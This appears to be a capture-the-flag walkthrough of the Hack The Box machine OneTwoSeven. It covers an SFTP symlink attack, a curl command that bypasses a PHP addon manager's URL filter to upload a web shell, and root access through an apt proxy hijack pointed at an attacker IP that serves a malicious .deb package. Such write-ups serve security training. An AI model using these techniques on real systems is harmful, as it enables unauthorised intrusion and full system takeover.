Always ping the machine before running the nmap scan.
All port scan discloses port 60080 to be filtered, so we will keep that in mind.
WAF/Firewall Running
Some kind of firewall shutting down the webserver after certain amount of requests. This kind of scenario happens when are sending a lot of requests at the same time. So we cannot run gobuster scan.
We can poke around the website and start with manual enumeration.
When we click on the Signup today button, we get to this page with a set of credentials.
In computing, the SSH File Transfer Protocol is a network protocol that provides file access, file transfer, and file management over any reliable data stream. It was designed by the Internet Engineering Task Force as an extension of the Secure Shell protocol version 2.0 to provide secure file transfer capabilities.
Note:
1) Admin Link disabled - http://onetwoseven.htb:60080/
2) Interesting comments found on the source page
- Only enable link if access from trusted networks admin/20190212
- Added localhost admin/20190214
So the admin access is only enabled for trusted network and in this case is localhost (127.0.0.1)
Enumerating SFTP (Secure File Transfer Protocol)
We can try to login to SSH using the given credentials.
Nope that didn't work. Let's try using SFTP command that is pre-installed in Kali.
We have this website http://onetwoseven.htb/~ots-lYmQ1YWI/ where we can upload files if we want using SFTP Server. Let's see if this works properly. I will try to upload a basic html file.
Looks like we can upload a file and that file will be served on the web-server.
But for some reason, we can't upload a php file and if we try to upload it, it gives us the following error.
SFTP Symlink attack
There was a vulnerability related to SFTP wherein we can create a symlink where we have read and write privileges. This attack is known as SFTP Symlink attack.
Read more about here . Now we can try to list the root of the system using the following command.
A symbolic link, also termed a soft link, is a special kind of file that points to another file, much like a shortcut in Windows or a Macintosh alias. Unlike a hard link, a symbolic link does not contain the data in the target file. It simply points to another entry somewhere in the file system.
symlink / root_file
We can only access the /var/www/html and /var/www/html-admin directory. So let's get all the html/php files and start analyzing it.
This login.php file belongs to the Administrator back-end which is running on port 60080 on localhost. So we need to get access to that. We can use SSH Port forwarding option.
#Code for addon manager
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /login.php"); }; if ( strpos($_SERVER['REQUEST_URI'], '/addons/') !== false ) { die(); };
# OneTwoSeven Admin Plugin
# OTS Addon Manager
switch (true) {
# Upload addon to addons folder.
case preg_match('/\/addon-upload.php/',$_SERVER['REQUEST_URI']):
if(isset($_FILES['addon'])){
$errors= array();
$file_name = basename($_FILES['addon']['name']);
$file_size =$_FILES['addon']['size'];
$file_tmp =$_FILES['addon']['tmp_name'];
if($file_size > 20000){
$errors[]='Module too big for addon manager. Please upload manually.';
}
if(empty($errors)==true) {
move_uploaded_file($file_tmp,$file_name);
header("Location: /menu.php");
header("Content-Type: text/plain");
echo "File uploaded successfull.y";
} else {
header("Location: /menu.php");
header("Content-Type: text/plain");
echo "Error uploading the file: ";
print_r($errors);
}
}
break;
# Download addon from addons folder.
case preg_match('/\/addon-download.php/',$_SERVER['REQUEST_URI']):
if ($_GET['addon']) {
$addon_file = basename($_GET['addon']);
if ( file_exists($addon_file) ) {
header("Content-Disposition: attachment; filename=$addon_file");
header("Content-Type: text/plain");
readfile($addon_file);
} else {
header($_SERVER["SERVER_PROTOCOL"]." 404 Not Found", true, 404);
die();
}
}
break;
default:
echo "The addon manager must not be executed directly but only via<br>";
echo "the provided RewriteRules:<br><hr>";
echo "RewriteEngine On<br>";
echo "RewriteRule ^addon-upload.php addons/ots-man-addon.php [L]<br>";
echo "RewriteRule ^addon-download.php addons/ots-man-addon.php [L]<br><hr>";
echo "By commenting individual RewriteRules you can disable single<br>";
echo "features (i.e. for security reasons)<br><br>";
echo "<font size='-2'>Please note: Disabling a feature through htaccess leads to 404 errors for now.</font>";
break;
}
?>
So if we try to access addon-upload.php, it will overwrite itself with addons/ots-man-addon.php. And same goes for addon-download.php. We can bypass this filter by using the following case.
/addon-download.php&/addon-upload.php
curl -X POST "http://localhost:60080/addon-download.php&/addon-upload.php" -F 'addon=@shell.php'
Python script to get a reverse shell
Configuring Burp Proxy for MITM Attack
We can run /usr/bin/apt-get update as well as /usr/bin/apt-get upgrade as the superuser. Interesting thing to note over here is we can use any kind of HTTP proxy if we want. That means we can assume this to be a MITM Attack.
export http_proxy="http://10.10.14.5:1337"
So when we will run apt-get update, the request will go over to http://10.10.14.5:1337/ i.e Burp Proxy and then the proxy will redirect the request to our Python HTTP Server listening on port 8000.
So when we run sudo apt-get update, we get a following set of requests on our web server.
First the directory should be telnet, then it should contain another directory named DEBIAN and the DEBIAN directory should contain two files. control and postinst
control is almost as same as the Packages file and postinst will contain our malicious code.
Now to create the deb file, run the following command in the terminal.
dpkg-deb --build telnet/
Now we still need to edit the Size and SHA256 in the Packages file.
Getting Root Access
Copy the Size and SHA256 Sum and now we are good to go. First let's look at the directory structure.
Don't forget to convert Packages file to Packages.gz using gzip
Now we will run two commands: sudo apt-get update followed by sudo apt-get upgrade
